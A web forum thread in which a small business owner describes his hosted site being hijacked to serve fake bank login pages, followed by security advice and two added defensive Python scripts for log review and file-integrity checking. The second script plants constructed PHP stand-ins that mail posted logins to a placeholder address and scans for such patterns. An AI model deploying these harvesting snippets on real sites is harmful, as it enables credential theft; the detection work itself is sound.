Our Website Hacked - Long Story Short



Stitch Up
26-07-2011, 03:20 PM
4pm yesterday, all our email accounts simply stopped working. Then I discovered our website had been suspended! The 24hrs following have been horrid!

Website had been hacked by someone placing a file java.php into the Public folder. The code produced a login page for an Italian bank and passed details of anyone attempting to login to the attacker!

The upshot is that it trashed the website by creating 1,000's of emails.

And I thought it was secure!!!

John

AdamB
26-07-2011, 03:47 PM
Jeez John - hopefully they never got any of the customers' 'private' details (i.e. credit/debit card details etc).

Not had much luck lately mate have you - what with the DTG problems and now this ................. I won't say it comes in threes!

Stitch Up
26-07-2011, 03:54 PM
Well, it's perhaps what I needed to get rid of a crap website - it's trashed now. It didn't work anyway and had no sales through it so no chance of anyone's details going elsewhere!

DTG is up and running now - my BIG problem is time, just not enough of it.

John

John G
26-07-2011, 04:33 PM
Hi John, good to hear the DTG is up and running again - I've got plenty of spare time so if you fancy you can install your machine at my premises FOC :wink:

mrs maggot
26-07-2011, 04:50 PM
Blimey John, sorry to hear about your bad luck, were the hosting company good when it happened ??

Stitch Up
26-07-2011, 05:06 PM
JustHost have been brilliant - nearly immediate help.

mrs maggot
26-07-2011, 05:11 PM
That's good to hear, it's only when the sh*t hits the fan that you tend to know if the hosting company are any good - and you are never in the mood for hold music or "eloo mister i may help you i am sam from engerland"

JSR
26-07-2011, 11:53 PM
Do you know how they put this php file into your webspace? It might be helpful to others to know if it was an insecure script or something that gave them access to your space.

Stitch Up
27-07-2011, 09:38 AM
@JSR
As I had my site designed by a 3rd party, I can only guess that its security wasn't great! I had a problem a year ago and got someone from the OSCommerce forums who specialised in securing sites, to sort it out and 'lock the site down' - his words not mine. I paid him to do it.

So your guess is as good as mine!

The way it works from what I understand is:
1. A bogus email is sent purporting to come from the recipient's bank.
2. The email informs them of a security breach on their account and asks them to login to rectify it - a link is provided.
3. They click the link and it takes them to a fake bank login page. This page, in my case java.php, had been placed on my hosting service!
4. They type in their login details on the java.php page and the login details are sent to the attacker.

That's about it - a very common occurrence I'm told.

Anyway, my whole site, coding and everything has now been removed.

John

JSR
27-07-2011, 11:16 AM
It's a pity you can't find out how the file got on there in the first place, so that you can be wary of it in the future.

It's quite possible that your website was "locked down". It's typical to have many websites run on the same server or virtual server. If the server isn't sufficiently secure, one website can affect another - so it could have been an insecure script on someone else's website (or even a malicious user who's purposefully uploading dodgy scripts to their own website).

So I wouldn't immediately blame the OScommerce forum guy - who, I'm sure, secured the oscommerce scripts as much as he was able. Without knowing how the file got there, it's difficult to know how to prevent it in the future. It's particularly scary to be told that it's a "very common occurrence" without knowing how it happened.

Stitch Up
27-07-2011, 12:08 PM
My priority was to re-establish my email accounts, I wasn't overly bothered about my website as I'd grown to dislike it!

I doubt a day goes by when I don't receive a 'phishing' email, usually purporting to be from a bank. It has the exact same content as I described above, and is often from a bank with whom I've never had an account! I can fully understand how some get caught.

JSR
27-07-2011, 12:26 PM
I appreciate your priorities. I think we all get phishing emails. I just wondered how they got the file onto your webspace in the first place. I guess it's just one of those things.

Stitch Up
27-07-2011, 06:12 PM
..... and they've done it again!!!

I just had a call from:

Dear Web Site Administrator

The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com) has received a report of a fraudulent financial web page (illegal phishing content) hosted on a website you administer.

URL: http://www.stitch-up.biz/cimbclicks.com/cimbclicks.htm
Additional URLs:
http://www.stitch-up.biz/cimbclicks.com/servlet.php
http://www.stitch-up.biz/cimbclicks.com/processing.php
http://www.stitch-up.biz/cimbclicks.com/data.php
http://www.stitch-up.biz/cimbclicks.com/validate.php
http://www.stitch-up.biz/cimbclicks.com/database.php
http://www.stitch-up.biz/cimbclicks.com/complete.htm
http://www.stitch-up.biz/cimbclicks.com/currentHighlights.htm
Brand Phished: CIMB Bank
IP Address: 69.175.7.250

*************************

On behalf of our client, we would greatly appreciate your assistance in:

a) Urgently Cleaning, closing or disallowing access to the site listed above as appropriate.

b) obtaining and providing to us additional information regarding this incident, for example relevant logs or file from the host,


I went to my site and sure enough, they'd planted a false site!!

I've now password protected the access to the folder.

ASLCreative
11-01-2012, 05:31 PM
Unfortunately such hacking of websites is quite common.

The problem often lies in using open source software or free 3rd party scripts being used on your website. Hackers know the entry points to such software and then just use Google to search for sites running such software. Then they test to see if the entry point is open. If it is they enter and do their stuff.

Another method that hackers use is to put malware on to a person's PC. They then scan the PC for any website ftp usernames and passwords. Once they have those your site becomes theirs.

Here are some things you can do to help stop hacking:

1. Have two PCs. One is used to surf the internet and answer emails. The second PC is used to upload files to your website, download website orders and do general admin duties. The second machine should never be exposed to malware. Both machines should have anti-virus software.
2. Try and avoid open source products. If you must use open source products, ensure you keep the software up to date and subscribe to any update feed. Plus follow any security advice in the forums associated with the software.
3. Use non-dictionary usernames and passwords for logins.
4. Take a daily look at your website logs - any sudden increase in traffic should be immediately investigated.
5. Change your passwords regularly.

These are just a few suggestions.

Oh yes, never store credit card numbers on your website.

Andrew
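Andrew's fourth tip (look at the logs every day) is easier to act on with a small script than by eye. The following is an added example, not code from the thread or from any of the posters: it parses a few constructed Apache combined-format lines and flags two things that would have shown up in John's case - requests into a directory the shop never had (the cimbclicks.com folder from the FraudWatch notice) and POSTs to scripts the site does not own (java.php). The KNOWN_DIRS and KNOWN_POST_TARGETS sets, the IP addresses and the script names other than those named in the thread are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in Apache "combined" log format. IPs are documentation
# ranges; the odd paths mirror the ones named in the thread (java.php and the
# cimbclicks.com folder). Nothing here is a real log.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Jul/2011:09:01:12 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [27/Jul/2011:09:01:15 +0100] "GET /product_info.php?products_id=12 HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Jul/2011:09:02:40 +0100] "GET /cimbclicks.com/cimbclicks.htm HTTP/1.1" 200 4096 "http://mail.example/" "Mozilla/5.0"
198.51.100.7 - - [27/Jul/2011:09:02:58 +0100] "POST /cimbclicks.com/servlet.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jul/2011:09:03:01 +0100] "GET /cimbclicks.com/cimbclicks.htm HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jul/2011:09:03:20 +0100] "POST /cimbclicks.com/servlet.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [27/Jul/2011:09:04:00 +0100] "POST /java.php HTTP/1.1" 200 210 "-" "Mozilla/5.0"
203.0.113.10 - - [27/Jul/2011:09:05:10 +0100] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.10 - - [27/Jul/2011:09:05:30 +0100] "GET /images/logo.png HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# What the shop is expected to serve. Both sets are assumptions for this example;
# on a real site they would be derived from the deployed file list.
KNOWN_DIRS = {"/", "/images", "/includes", "/admin"}
KNOWN_POST_TARGETS = {"/login.php", "/checkout_process.php", "/account_edit.php"}


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["path"] = rec.pop("target").split("?", 1)[0]   # drop the query string
            rec["status"] = int(rec["status"])
            rec["hour"] = rec["ts"][:14]                       # e.g. "27/Jul/2011:09"
            records.append(rec)
    return records


def top_dir(path):
    """'/cimbclicks.com/servlet.php' -> '/cimbclicks.com'; '/java.php' -> '/'."""
    parts = path.strip("/").split("/")
    return "/" + parts[0] if len(parts) > 1 else "/"


def review(records):
    """Flag directories the site never had and POSTs to scripts it does not own."""
    findings = {
        "unknown_dirs": Counter(),
        "unexpected_posts": Counter(),
        "posting_ips": defaultdict(set),
    }
    for rec in records:
        d = top_dir(rec["path"])
        if d not in KNOWN_DIRS:
            findings["unknown_dirs"][d] += 1
        if rec["method"] == "POST" and rec["path"] not in KNOWN_POST_TARGETS:
            findings["unexpected_posts"][rec["path"]] += 1
            findings["posting_ips"][rec["path"]].add(rec["ip"])
    return findings


def hourly_volume(records):
    """Requests per hour: the simplest 'sudden increase in traffic' signal."""
    return Counter(rec["hour"] for rec in records)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    f = review(recs)
    for d, n in f["unknown_dirs"].most_common():
        print(f"unknown directory {d}: {n} hits")
    for p, n in f["unexpected_posts"].most_common():
        print(f"POST to {p}: {n} from {sorted(f['posting_ips'][p])}")
    print(dict(hourly_volume(recs)))
```

Run against a real access log, the two allow-lists are the only thing that needs maintaining; a phishing page planted in a fresh folder, or a POST handler dropped into the web root, surfaces the first day it receives traffic rather than when an abuse desk sends an email.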

mrs maggot
11-01-2012, 11:30 PM
Crikey, I thought it had happened again, then saw Andrew has pulled up an old post. Phew is all I can say.

Andrew, it might have been worth making this into a new post about website security, as I think more people will read it. Maybe admin can repost your post as a new topic.

AdamB
12-01-2012, 08:13 AM
Andrew, it might have been worth making this into a new post about website security, as I think more people will read it. Maybe admin can repost your post as a new topic.

Not sure why you would think that Laura as Andrew's post is related to the subject?

mrs maggot
12-01-2012, 08:33 AM
Yes it is, but if they read the 1st page 1st, then they might see the date and then not read to the end. I just thought, as we were getting top tips together for each section, then these are top tips for website safety - something which we have nothing on at the moment.

Andrew
12-01-2012, 08:44 AM
We got caught with one of our sites and as Andrew states above it's when websites are based on open source software where the website templates exist and are modified to suit your needs. The hackers spend time finding a way in which is often the same for many and then upload their files for whatever means they desire. It's all about securing your site with password protection at the required levels. They uploaded backlinks on ours so not as bad as what happened to John.

JSR
12-01-2012, 11:01 AM
The problem often lies in using open source software ... Try and avoid open source products.
I don't know how anyone can avoid using open source products these days. If you run Apache httpd, you're using open source products. If you use PHP, you're using open source products. If you're using Linux, you're using open source products. How does anyone avoid using open source products these days?

ASLCreative
12-01-2012, 11:52 AM
I don't know how anyone can avoid using open source products these days.
You're right John, it is very difficult to avoid such open source products when creating websites. Even non-open source software could still have weak points.

Just like your house, if somebody wants to break in they will, you just have to make it harder for them - that is why houses have locks to doors and windows. If all of the known weak points in a website are protected, then it will be harder for the hacker to try and get in.

Andrew
One thing though, all website owners should work on the basis that one day they will be hacked. So you should make daily backups of all databases and store them away from your website. All files and images for your website should be backed up away from your website.

This way if you do get hacked then the files are readily available to reinstate the website quickly.
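Working on the basis that you will be hacked also means being able to tell what changed. The following is an added example, not code from the thread or from any poster or product mentioned in it: it records a SHA-256 manifest of the web root, stores it away from the site as Andrew suggests for backups, and on the next check reports files that were added, removed or modified, then looks inside any new or changed PHP file for the kind of behaviour John described earlier (a page that takes posted login details and mails or stores them, or an obfuscated eval). The demo builds a throwaway web root, plants stand-ins named after the files in the thread (java.php, cimbclicks.com/...) and re-checks. The indicator patterns, file names other than those in the thread, and the planted contents are all constructed for the example.

```python
import hashlib
import json
import os
import re
import tempfile

# Heuristic indicators of a planted credential-harvesting page or backdoor.
# Chosen for this example; they are not an exhaustive or authoritative list.
INDICATORS = {
    "posts_to_mail": re.compile(r"\$_(POST|REQUEST)[\s\S]{0,300}?\bmail\s*\("),
    "writes_posted_data": re.compile(r"\$_(POST|REQUEST)[\s\S]{0,300}?\b(fwrite|file_put_contents)\s*\("),
    "eval_of_decoded": re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
}

SCRIPT_EXTS = (".php", ".phtml", ".php5")


def build_manifest(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256 digest."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Report files that appeared, vanished or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def scan_indicators(text):
    """Names of the indicators that match the given script source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def review_webroot(root, baseline):
    """Compare the live tree with the baseline and inspect new or changed scripts."""
    delta = diff_manifests(baseline, build_manifest(root))
    flagged = {}
    for rel in delta["added"] + delta["modified"]:
        if not rel.lower().endswith(SCRIPT_EXTS):
            continue
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            hits = scan_indicators(fh.read())
        if hits:
            flagged[rel] = hits
    return delta, flagged


def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Constructed web root: baseline it, plant files like those in the thread, re-check."""
    root = tempfile.mkdtemp(prefix="webroot-")
    _write(root, "index.php", "<?php require 'includes/config.php'; echo 'shop'; ?>\n")
    _write(root, "includes/config.php", "<?php define('DB_SERVER', 'localhost'); ?>\n")
    _write(root, "images/logo.png", "not really a png\n")

    # Baseline manifest kept outside the web root, like the off-site backups above.
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="manifests-"), "baseline.json")
    with open(baseline_path, "w", encoding="utf-8") as fh:
        json.dump(build_manifest(root), fh)

    # Simulated compromise: a harvesting page at the root, a fake-bank folder and a
    # tampered config file. Contents are constructed stand-ins, not real kit code.
    _write(root, "java.php",
           "<?php $f = $_POST;\nmail('drop@example.invalid', 'login', implode(',', $f));\n")
    _write(root, "cimbclicks.com/cimbclicks.htm",
           "<html><form method=post action=servlet.php></form></html>\n")
    _write(root, "cimbclicks.com/servlet.php",
           "<?php $u = $_POST['user'];\nfile_put_contents('data.php', $u, FILE_APPEND);\n"
           "mail('drop@example.invalid', 'login', $u);\n")
    _write(root, "includes/config.php",
           "<?php define('DB_SERVER', 'localhost');\neval(base64_decode('PLACEHOLDER'));\n")

    with open(baseline_path, encoding="utf-8") as fh:
        baseline = json.load(fh)
    return review_webroot(root, baseline)


if __name__ == "__main__":
    delta, flagged = demo()
    for kind, paths in delta.items():
        print(f"{kind}: {paths}")
    for path, hits in flagged.items():
        print(f"FLAG {path}: {', '.join(hits)}")
```

The manifest diff is the part that matters: it catches a planted folder or a tampered config file whether or not the content heuristics recognise it, and the same manifest tells you exactly which files to restore from the off-site backup. Re-baseline only after a deliberate deployment, never after an unexplained change.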

JSR
12-01-2012, 12:12 PM
Very true. The internet is a public place and as soon as you put anything "out there", there will be someone trying to hack it.

One of the common issues I've read about over the last year or two is when a website is hacked due to another website hosted on the same server. You can secure yours as much as you like, but if the server isn't protected well enough then a hack into someone else's website can affect everyone else's website that's hosted on the same server.

With more and more hosts cramming more and more sites onto the same server at lower and lower prices, it's only to be expected that these things could happen. A hacker could easily buy a hosting package on the same server as your website for the sole purpose of uploading scripts that can affect everyone else's website on the same server.

It's also important to ensure that whichever host you go with keeps their software updated. It's no good the host using an old version of PHP just because the new one might prevent a thousand websites on that server from working properly. That's not your problem, it's theirs. You need to be able to keep everything up-to-date.

Going cheap isn't always prudent.